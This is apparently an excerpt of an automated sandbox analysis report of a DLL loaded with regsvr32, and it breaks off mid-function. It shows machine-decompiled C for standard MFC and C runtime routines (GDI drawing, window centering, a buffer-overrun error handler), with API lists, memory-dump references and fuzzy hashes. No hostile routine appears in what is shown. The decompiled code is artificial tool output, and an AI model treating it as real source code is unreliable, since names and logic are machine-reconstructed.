                                                                        • SysFreeString.OLEAUT32(?), ref: 10039EAD
                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 10039EE5
                                                                        • VariantClear.OLEAUT32(?), ref: 10039EF5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
                                                                        • String ID:
                                                                        • API String ID: 344392101-0
                                                                        • Opcode ID: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
                                                                        • Instruction ID: b8867a34d175485d2cb2ae4ba9cdbf6ea03067932d09ff1053ffea89e27b22ec
                                                                        • Opcode Fuzzy Hash: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
                                                                        • Instruction Fuzzy Hash: DBE1697590021ADFDF12CFA8D881AAEBBF5FF45342F214429E951EB261D730AE51CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10033FCE Relevance: 19.7, APIs: 13, Instructions: 233windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10033FCE(intOrPtr* __ecx, void* __eflags) {
				void* __esi;
				void* _t132;
				void* _t145;
				intOrPtr* _t226;
				void* _t229;

				E10011BF0(0x1003b231, _t229);
				_t226 = __ecx;
				 *((intOrPtr*)(_t229 - 0x30)) = 0;
				 *((intOrPtr*)(_t229 - 0x34)) = 0x10040668;
				 *(_t229 - 4) = 0;
				 *((intOrPtr*)(_t229 - 0x28)) = 0;
				 *((intOrPtr*)(_t229 - 0x2c)) = 0x10040668;
				 *((intOrPtr*)(_t229 - 0x20)) = 0;
				 *((intOrPtr*)(_t229 - 0x24)) = 0x10040668;
				 *(_t229 - 4) = 2;
				E1000B4EC(_t229 - 0x2c,  *(_t229 + 8));
				CopyRect(_t229 - 0x44,  *(_t229 + 8));
				InflateRect(_t229 - 0x44,  ~( *(_t229 + 0xc)),  ~( *(_t229 + 0x10)));
				IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 8));
				E1002935D(_t229 - 0x24, CreateRectRgnIndirect(_t229 - 0x44));
				E1002935D(_t229 - 0x34, CreateRectRgn(0, 0, 0, 0));
				E10010478(_t229 - 0x34, _t229 - 0x2c, _t229 - 0x24, 3);
				_t235 =  *((intOrPtr*)(_t229 + 0x20));
				if( *((intOrPtr*)(_t229 + 0x20)) == 0) {
					 *((intOrPtr*)(_t229 + 0x20)) = E10033F2F(_t226, _t235);
				}
				if( *((intOrPtr*)(_t229 + 0x24)) == 0) {
					 *((intOrPtr*)(_t229 + 0x24)) =  *((intOrPtr*)(_t229 + 0x20));
				}
				 *((intOrPtr*)(_t229 - 0x18)) = 0;
				 *((intOrPtr*)(_t229 - 0x1c)) = 0x10040668;
				 *((intOrPtr*)(_t229 - 0x10)) = 0;
				 *((intOrPtr*)(_t229 - 0x14)) = 0x10040668;
				 *(_t229 - 4) = 4;
				if( *(_t229 + 0x14) != 0) {
					E1002935D(_t229 - 0x1c, CreateRectRgn(0, 0, 0, 0));
					E1001045D(_t229 - 0x2c,  *(_t229 + 0x14));
					CopyRect(_t229 - 0x44,  *(_t229 + 0x14));
					InflateRect(_t229 - 0x44,  ~( *(_t229 + 0x18)),  ~( *(_t229 + 0x1c)));
					IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 0x14));
					E1001045D(_t229 - 0x24, _t229 - 0x44);
					E10010478(_t229 - 0x1c, _t229 - 0x2c, _t229 - 0x24, 3);
					if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4))) {
						E1002935D(_t229 - 0x14, CreateRectRgn(0, 0, 0, 0));
						E10010478(_t229 - 0x14, _t229 - 0x1c, _t229 - 0x34, 3);
					}
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4)) &&  *(_t229 + 0x14) != 0) {
					E10028E1A(_t226, _t229 - 0x1c);
					 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
					 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x24)));
					PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
					E10029439(_t226,  *(_t229 + 0x14));
				}
				_t132 = _t229 - 0x14;
				if( *((intOrPtr*)(_t229 - 0x10)) == 0) {
					_t132 = _t229 - 0x34;
				}
				E10028E1A(_t226, _t132);
				 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
				 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x20)));
				PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
				if( *(_t229 + 0x14) != 0) {
					E10029439(_t226,  *(_t229 + 0x14));
				}
				E10028E1A(_t226, 0);
				 *(_t229 - 4) = 3;
				 *((intOrPtr*)(_t229 - 0x14)) = 0x1003eb6c;
				E100293B4(_t229 - 0x14);
				 *(_t229 - 4) = 2;
				 *((intOrPtr*)(_t229 - 0x1c)) = 0x1003eb6c;
				E100293B4(_t229 - 0x1c);
				 *(_t229 - 4) = 1;
				 *((intOrPtr*)(_t229 - 0x24)) = 0x1003eb6c;
				E100293B4(_t229 - 0x24);
				 *(_t229 - 4) = 0;
				 *((intOrPtr*)(_t229 - 0x2c)) = 0x1003eb6c;
				E100293B4(_t229 - 0x2c);
				 *(_t229 - 4) =  *(_t229 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t229 - 0x34)) = 0x1003eb6c;
				_t145 = E100293B4(_t229 - 0x34);
				 *[fs:0x0] =  *((intOrPtr*)(_t229 - 0xc));
				return _t145;
			}








                                                                        0x10033fd3
                                                                        0x10033fe5
                                                                        0x10033fe7
                                                                        0x10033fea
                                                                        0x10033fed
                                                                        0x10033ff0
                                                                        0x10033ff3
                                                                        0x10033ff6
                                                                        0x10033ff9
                                                                        0x10034002
                                                                        0x10034006
                                                                        0x10034012
                                                                        0x10034028
                                                                        0x10034036
                                                                        0x1003404a
                                                                        0x1003405d
                                                                        0x1003406f
                                                                        0x10034074
                                                                        0x10034077
                                                                        0x1003407e
                                                                        0x1003407e
                                                                        0x10034084
                                                                        0x10034089
                                                                        0x10034089
                                                                        0x1003408c
                                                                        0x1003408f
                                                                        0x10034092
                                                                        0x10034095
                                                                        0x1003409b
                                                                        0x1003409f
                                                                        0x100340b5
                                                                        0x100340c0
                                                                        0x100340cc
                                                                        0x100340e2
                                                                        0x100340f0
                                                                        0x100340fd
                                                                        0x1003410f
                                                                        0x10034120
                                                                        0x1003412c
                                                                        0x1003413e
                                                                        0x1003413e
                                                                        0x10034120
                                                                        0x10034155
                                                                        0x10034162
                                                                        0x1003416f
                                                                        0x10034182
                                                                        0x1003419b
                                                                        0x100341a2
                                                                        0x100341a2
                                                                        0x100341aa
                                                                        0x100341ad
                                                                        0x100341af
                                                                        0x100341af
                                                                        0x100341b5
                                                                        0x100341c2
                                                                        0x100341d5
                                                                        0x100341ee
                                                                        0x100341f3
                                                                        0x100341fa
                                                                        0x100341fa
                                                                        0x10034202
                                                                        0x1003420f
                                                                        0x10034213
                                                                        0x10034216
                                                                        0x1003421e
                                                                        0x10034222
                                                                        0x10034225
                                                                        0x1003422d
                                                                        0x10034231
                                                                        0x10034234
                                                                        0x1003423c
                                                                        0x1003423f
                                                                        0x10034242
                                                                        0x10034247
                                                                        0x1003424e
                                                                        0x10034251
                                                                        0x1003425c
                                                                        0x10034264

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10033FD3
                                                                          • Part of subcall function 1000B4EC: CreateRectRgnIndirect.GDI32(00000000), ref: 1000B4F3
                                                                        • CopyRect.USER32 ref: 10034012
                                                                        • InflateRect.USER32(?,?,?), ref: 10034028
                                                                        • IntersectRect.USER32 ref: 10034036
                                                                        • CreateRectRgnIndirect.GDI32(?), ref: 10034040
                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034053
                                                                          • Part of subcall function 10010478: CombineRgn.GDI32(?,?,?,00000003), ref: 1001049B
                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 100340AF
                                                                        • CopyRect.USER32 ref: 100340CC
                                                                        • InflateRect.USER32(?,?,?), ref: 100340E2
                                                                        • IntersectRect.USER32 ref: 100340F0
                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034126
                                                                          • Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
                                                                          • Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
                                                                          • Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C
                                                                        • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 1003419B
                                                                          • Part of subcall function 10029439: SelectObject.GDI32(?,00000000), ref: 1002945B
                                                                          • Part of subcall function 10029439: SelectObject.GDI32(?,00000004), ref: 10029471
                                                                        • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 100341EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prologPattern
                                                                        • String ID:
                                                                        • API String ID: 897514543-0
                                                                        • Opcode ID: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
                                                                        • Instruction ID: e5f9903ccf7cdd00105ec8572482158fef9e459befd851420e55a1fcda6e3601
                                                                        • Opcode Fuzzy Hash: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
                                                                        • Instruction Fuzzy Hash: 4191EFB690010DEFCF06DFA4D995CEEBBB9EF08244F51411AF906A7251DB34AE06CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100219DD Relevance: 19.7, APIs: 13, Instructions: 174windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 90%
                                                                        			E100219DD(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				intOrPtr _t55;
				struct HWND__* _t56;
				intOrPtr _t78;
				intOrPtr _t90;
				signed int _t99;
				struct HWND__* _t100;
				struct HWND__* _t102;
				void* _t104;
				long _t110;
				void* _t113;
				struct HWND__* _t115;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t123;

				_t113 = __edx;
				_t119 = __ecx;
				_v12 = __ecx;
				_v8 = E100202AB(__ecx);
				_t55 = _a4;
				if(_t55 == 0) {
					if((_v5 & 0x00000040) == 0) {
						_t56 = GetWindow( *(__ecx + 0x1c), 4);
					} else {
						_t56 = GetParent( *(__ecx + 0x1c));
					}
					_t115 = _t56;
					if(_t115 != 0) {
						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
						if(_t100 != 0) {
							_t115 = _t100;
						}
					}
				} else {
					_t115 =  *(_t55 + 0x1c);
				}
				GetWindowRect( *(_t119 + 0x1c),  &_v44);
				if((_v5 & 0x00000040) != 0) {
					_t102 = GetParent( *(_t119 + 0x1c));
					GetClientRect(_t102,  &_v28);
					GetClientRect(_t115,  &_v60);
					MapWindowPoints(_t115, _t102,  &_v60, 2);
				} else {
					if(_t115 != 0) {
						_t99 = GetWindowLongA(_t115, 0xfffffff0);
						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
							_t115 = 0;
						}
					}
					_v100 = 0x28;
					if(_t115 != 0) {
						GetWindowRect(_t115,  &_v60);
						E10007B50(E10007AE5(_t115, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t90 = E10006C53();
						if(_t90 != 0) {
							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
						}
						E10007B50(E10007AE5(_t90, 1),  &_v100);
						CopyRect( &_v60,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t117 = _v44.right - _v44.left;
				asm("cdq");
				_t104 = _v44.bottom - _v44.top;
				asm("cdq");
				_t114 = _v60.bottom;
				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
				asm("cdq");
				asm("cdq");
				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
				if(_t110 >= _v28.left) {
					_t78 = _v28.right;
					if(_t117 + _t110 > _t78) {
						_t110 = _t78 - _v44.right + _v44.left;
					}
				} else {
					_t110 = _v28.left;
				}
				if(_t123 >= _v28.top) {
					if(_t104 + _t123 > _v28.bottom) {
						_t123 = _v44.top - _v44.bottom + _v28.bottom;
					}
				} else {
					_t123 = _v28.top;
				}
				return E100204FE(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
			}

























                                                                        0x100219dd
                                                                        0x100219e5
                                                                        0x100219e8
                                                                        0x100219f0
                                                                        0x100219f3
                                                                        0x100219f8
                                                                        0x10021a03
                                                                        0x10021a15
                                                                        0x10021a05
                                                                        0x10021a08
                                                                        0x10021a08
                                                                        0x10021a1b
                                                                        0x10021a1f
                                                                        0x10021a2b
                                                                        0x10021a33
                                                                        0x10021a35
                                                                        0x10021a35
                                                                        0x10021a33
                                                                        0x100219fa
                                                                        0x100219fa
                                                                        0x100219fa
                                                                        0x10021a44
                                                                        0x10021a4a
                                                                        0x10021aea
                                                                        0x10021af1
                                                                        0x10021af8
                                                                        0x10021b02
                                                                        0x10021a50
                                                                        0x10021a52
                                                                        0x10021a57
                                                                        0x10021a62
                                                                        0x10021a6b
                                                                        0x10021a6b
                                                                        0x10021a62
                                                                        0x10021a6f
                                                                        0x10021a76
                                                                        0x10021ab7
                                                                        0x10021ac6
                                                                        0x10021ad3
                                                                        0x10021a78
                                                                        0x10021a78
                                                                        0x10021a7f
                                                                        0x10021a81
                                                                        0x10021a81
                                                                        0x10021a91
                                                                        0x10021aa4
                                                                        0x10021aae
                                                                        0x10021aae
                                                                        0x10021a76
                                                                        0x10021b11
                                                                        0x10021b16
                                                                        0x10021b1c
                                                                        0x10021b23
                                                                        0x10021b26
                                                                        0x10021b2d
                                                                        0x10021b34
                                                                        0x10021b3b
                                                                        0x10021b42
                                                                        0x10021b47
                                                                        0x10021b4e
                                                                        0x10021b55
                                                                        0x10021b5d
                                                                        0x10021b5d
                                                                        0x10021b49
                                                                        0x10021b49
                                                                        0x10021b49
                                                                        0x10021b62
                                                                        0x10021b6e
                                                                        0x10021b76
                                                                        0x10021b76
                                                                        0x10021b64
                                                                        0x10021b64
                                                                        0x10021b64
                                                                        0x10021b8f

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                        • String ID:
                                                                        • API String ID: 808654186-0
                                                                        • Opcode ID: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
                                                                        • Instruction ID: c5023cb8dd4c56e62e69e6e4efe16b58097a74c7fe0422dfe49a5ff72fe10001
                                                                        • Opcode Fuzzy Hash: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
                                                                        • Instruction Fuzzy Hash: 9A51AD76A00219AFDB01DBA8DC89FEEBBBDEF48350F154115E901F7281EB30B9458B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10016BAA Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 111COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 50%
                                                                        			E10016BAA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t32;
				intOrPtr* _t33;
				void* _t41;
				signed int _t54;
				unsigned int _t59;
				void* _t75;
				intOrPtr* _t76;
				signed int _t81;
				char* _t83;
				void* _t86;
				intOrPtr _t87;
				void* _t88;
				intOrPtr _t89;

				_push(0x118);
				_push(0x10042558);
				E10012514(__ebx, __edi, __esi);
				_t32 =  *0x1004c470; // 0x303bb91f
				 *((intOrPtr*)(_t88 - 0x1c)) = _t32;
				_t33 =  *0x1004f708; // 0x0
				if(_t33 == 0) {
					if( *((intOrPtr*)(_t88 + 8)) == 1) {
						_t83 = "Buffer overrun detected!";
						 *(_t88 - 0x128) = "A buffer overrun has been detected which has corrupted the program\'s\ninternal state.  The program cannot safely continue execution and must\nnow be terminated.\n";
						_t86 = 0xb9;
					} else {
						_t83 = "Unknown security failure detected!";
						 *(_t88 - 0x128) = "A security error of unknown cause has been detected which has\ncorrupted the program\'s internal state.  The program cannot safely\ncontinue execution and must now be terminated.\n";
						_t86 = 0xd4;
					}
					 *((char*)(_t88 - 0x20)) = 0;
					if(GetModuleFileNameA(0, _t88 - 0x124, 0x104) == 0) {
						E10017B90(_t88 - 0x124, "<program name unknown>");
					}
					_t71 = _t88 - 0x124;
					if(E10011820(_t88 - 0x124) + 0xb > 0x3c) {
						E10019E20(E10011820(_t71) + _t88 - 0xf3, "...", 3);
						_t89 = _t89 + 0x10;
					}
					_t41 = E10011820(_t71);
					_pop(_t75);
					E10010B20(_t41 + _t86 + 0x0000000c + 0x00000003 & 0xfffffffc, _t75);
					 *((intOrPtr*)(_t88 - 0x18)) = _t89;
					_t87 = _t89;
					E10017B90(_t87, _t83);
					E10017BA0(_t87, "\n\n");
					E10017BA0(_t87, "Program: ");
					E10017BA0(_t87, _t71);
					E10017BA0(_t87, "\n\n");
					E10017BA0(_t87,  *(_t88 - 0x128));
					_push(0x12010);
					_push("Microsoft Visual C++ Runtime Library");
					_push(_t87);
					E10019D1D();
					_t89 = _t89 + 0x3c;
				} else {
					 *(_t88 - 4) = 0;
					 *_t33( *((intOrPtr*)(_t88 + 8)),  *((intOrPtr*)(_t88 + 0xc)));
					 *(_t88 - 4) =  *(_t88 - 4) | 0xffffffff;
				}
				E10011F56(3);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t81 =  *(_t89 + 4);
				_t76 =  *((intOrPtr*)(_t89 + 8));
				if((_t81 & 0x00000003) != 0) {
					if((_t81 & 0x00000001) == 0) {
						L27:
						_t54 =  *_t81;
						_t81 = _t81 + 2;
						if(_t54 !=  *_t76) {
							goto L22;
						} else {
							_t54 = _t54;
							if(_t54 == 0) {
								goto L21;
							} else {
								if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
									goto L22;
								} else {
									if(_t54 == 0) {
										goto L21;
									} else {
										_t76 = _t76 + 2;
										goto L12;
									}
								}
							}
						}
					} else {
						_t54 =  *_t81;
						_t81 = _t81 + 1;
						if(_t54 !=  *_t76) {
							goto L22;
						} else {
							_t76 = _t76 + 1;
							if(_t54 == 0) {
								goto L21;
							} else {
								if((_t81 & 0x00000002) == 0) {
									goto L12;
								} else {
									goto L27;
								}
							}
						}
					}
				} else {
					while(1) {
						L12:
						_t54 =  *_t81;
						if(_t54 !=  *_t76) {
							break;
						}
						_t54 = _t54;
						if(_t54 == 0) {
							L21:
							return 0;
						} else {
							if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
								break;
							} else {
								_t59 = _t54;
								if(_t59 == 0) {
									goto L21;
								} else {
									_t54 = _t59 >> 0x10;
									if(_t54 !=  *((intOrPtr*)(_t76 + 2))) {
										break;
									} else {
										_t54 = _t54;
										if(_t54 == 0) {
											goto L21;
										} else {
											if(_t54 !=  *((intOrPtr*)(_t76 + 3))) {
												break;
											} else {
												_t76 = _t76 + 4;
												_t81 = _t81 + 4;
												if(_t54 != 0) {
													continue;
												} else {
													goto L21;
												}
											}
										}
									}
								}
							}
						}
						goto L32;
					}
					L22:
					asm("sbb eax, eax");
					return (_t54 << 1) + 1;
				}
				L32:
			}
















                                                                        0x10016baa
                                                                        0x10016baf
                                                                        0x10016bb4
                                                                        0x10016bb9
                                                                        0x10016bbe
                                                                        0x10016bc1
                                                                        0x10016bca
                                                                        0x10016bef
                                                                        0x10016c07
                                                                        0x10016c0c
                                                                        0x10016c16
                                                                        0x10016bf1
                                                                        0x10016bf1
                                                                        0x10016bf6
                                                                        0x10016c00
                                                                        0x10016c00
                                                                        0x10016c1b
                                                                        0x10016c33
                                                                        0x10016c41
                                                                        0x10016c47
                                                                        0x10016c48
                                                                        0x10016c5d
                                                                        0x10016c7c
                                                                        0x10016c81
                                                                        0x10016c81
                                                                        0x10016c85
                                                                        0x10016c8a
                                                                        0x10016c95
                                                                        0x10016c9a
                                                                        0x10016c9d
                                                                        0x10016ca1
                                                                        0x10016cad
                                                                        0x10016cb8
                                                                        0x10016cbf
                                                                        0x10016cc6
                                                                        0x10016cd2
                                                                        0x10016cd7
                                                                        0x10016cdc
                                                                        0x10016ce1
                                                                        0x10016ce2
                                                                        0x10016ce7
                                                                        0x10016bcc
                                                                        0x10016bcc
                                                                        0x10016bd5
                                                                        0x10016bd9
                                                                        0x10016bd9
                                                                        0x10016cec
                                                                        0x10016cf1
                                                                        0x10016cf2
                                                                        0x10016cf3
                                                                        0x10016cf4
                                                                        0x10016cf5
                                                                        0x10016cf6
                                                                        0x10016cf7
                                                                        0x10016cf8
                                                                        0x10016cf9
                                                                        0x10016cfa
                                                                        0x10016cfb
                                                                        0x10016cfc
                                                                        0x10016cfd
                                                                        0x10016cfe
                                                                        0x10016cff
                                                                        0x10016d00
                                                                        0x10016d04
                                                                        0x10016d0e
                                                                        0x10016d52
                                                                        0x10016d6c
                                                                        0x10016d6c
                                                                        0x10016d6f
                                                                        0x10016d74
                                                                        0x00000000
                                                                        0x10016d76
                                                                        0x10016d76
                                                                        0x10016d78
                                                                        0x00000000
                                                                        0x10016d7a
                                                                        0x10016d7d
                                                                        0x00000000
                                                                        0x10016d7f
                                                                        0x10016d81
                                                                        0x00000000
                                                                        0x10016d83
                                                                        0x10016d83
                                                                        0x00000000
                                                                        0x10016d83
                                                                        0x10016d81
                                                                        0x10016d7d
                                                                        0x10016d78
                                                                        0x10016d54
                                                                        0x10016d54
                                                                        0x10016d56
                                                                        0x10016d5b
                                                                        0x00000000
                                                                        0x10016d5d
                                                                        0x10016d5d
                                                                        0x10016d62
                                                                        0x00000000
                                                                        0x10016d64
                                                                        0x10016d6a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10016d6a
                                                                        0x10016d62
                                                                        0x10016d5b
                                                                        0x10016d10
                                                                        0x10016d10
                                                                        0x10016d10
                                                                        0x10016d10
                                                                        0x10016d14
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10016d16
                                                                        0x10016d18
                                                                        0x10016d40
                                                                        0x10016d42
                                                                        0x10016d1a
                                                                        0x10016d1d
                                                                        0x00000000
                                                                        0x10016d1f
                                                                        0x10016d1f
                                                                        0x10016d21
                                                                        0x00000000
                                                                        0x10016d23
                                                                        0x10016d23
                                                                        0x10016d29
                                                                        0x00000000
                                                                        0x10016d2b
                                                                        0x10016d2b
                                                                        0x10016d2d
                                                                        0x00000000
                                                                        0x10016d2f
                                                                        0x10016d32
                                                                        0x00000000
                                                                        0x10016d34
                                                                        0x10016d34
                                                                        0x10016d37
                                                                        0x10016d3c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10016d3c
                                                                        0x10016d32
                                                                        0x10016d2d
                                                                        0x10016d29
                                                                        0x10016d21
                                                                        0x10016d1d
                                                                        0x00000000
                                                                        0x10016d18
                                                                        0x10016d44
                                                                        0x10016d44
                                                                        0x10016d4b
                                                                        0x10016d4b
                                                                        0x00000000

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,10042558,00000118,10011796,00000001,00000000,10041D50,00000008,10016B00,00000000,00000000,00000000), ref: 10016C2B
                                                                        • _strlen.LIBCMT ref: 10016C51
                                                                        • _strlen.LIBCMT ref: 10016C62
                                                                        • _strncpy.LIBCMT ref: 10016C7C
                                                                        • _strlen.LIBCMT ref: 10016C85
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen$FileModuleName_strncpy
                                                                        • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                        • API String ID: 2455649890-1673886896
                                                                        • Opcode ID: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
                                                                        • Instruction ID: 88295e5d41c60b50e9a3e58cda1e4c53c685b81e948abb858cf034152a287b35
                                                                        • Opcode Fuzzy Hash: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
                                                                        • Instruction Fuzzy Hash: 6731B476A052146BDB15DB60CC82FDE36B8EF05214F600169F514EF142DB38EBD18BA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10018081 Relevance: 16.8, APIs: 11, Instructions: 299COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 75%
                                                                        			E10018081(void* __ebx, void* __edi, int __esi, void* __eflags) {
				signed int _t119;
				intOrPtr _t120;
				int _t122;
				char* _t125;
				int _t132;
				signed int _t134;
				int _t137;
				int _t138;
				short* _t160;
				short* _t163;
				int _t164;
				signed int _t165;
				long _t169;
				signed int _t172;
				int _t181;
				char* _t183;
				int _t184;
				signed int _t186;
				int _t187;
				int _t190;
				void* _t192;
				short* _t193;
				char* _t195;
				char* _t196;
				signed int _t199;

				_t185 = __esi;
				_push(0x38);
				_push(0x10042708);
				E10012514(__ebx, __edi, __esi);
				_t199 =  *0x1004f73c; // 0x1
				if(_t199 == 0) {
					_t185 = 1;
					if(LCMapStringW(0, 0x100, 0x10042704, 1, 0, 0) == 0) {
						_t169 = GetLastError();
						__eflags = _t169 - 0x78;
						if(_t169 == 0x78) {
							 *0x1004f73c = 2;
						}
					} else {
						 *0x1004f73c = 1;
					}
				}
				if( *(_t192 + 0x14) <= 0) {
